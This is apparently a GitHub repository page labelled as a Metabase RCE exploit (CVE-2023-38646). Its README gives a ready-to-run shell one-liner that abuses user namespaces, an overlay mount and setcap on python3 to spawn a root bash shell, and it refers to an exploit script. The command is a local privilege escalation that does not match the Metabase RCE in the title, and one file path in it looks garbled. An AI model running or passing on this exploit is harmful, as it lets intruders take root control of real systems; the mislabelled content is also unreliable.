Skip to content

acesoyeo/METABASE-RCE-CVE-2023-38646-

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 

Repository files navigation

METABASE-RCE-CVE-2023-38646-

To get the root user of the machine or system according to the information above, this command and file will get into root user.

You can run this command directly or run as file and execute. Command: $unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'

Executed File: $./exploitsh.sh

Yay!

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages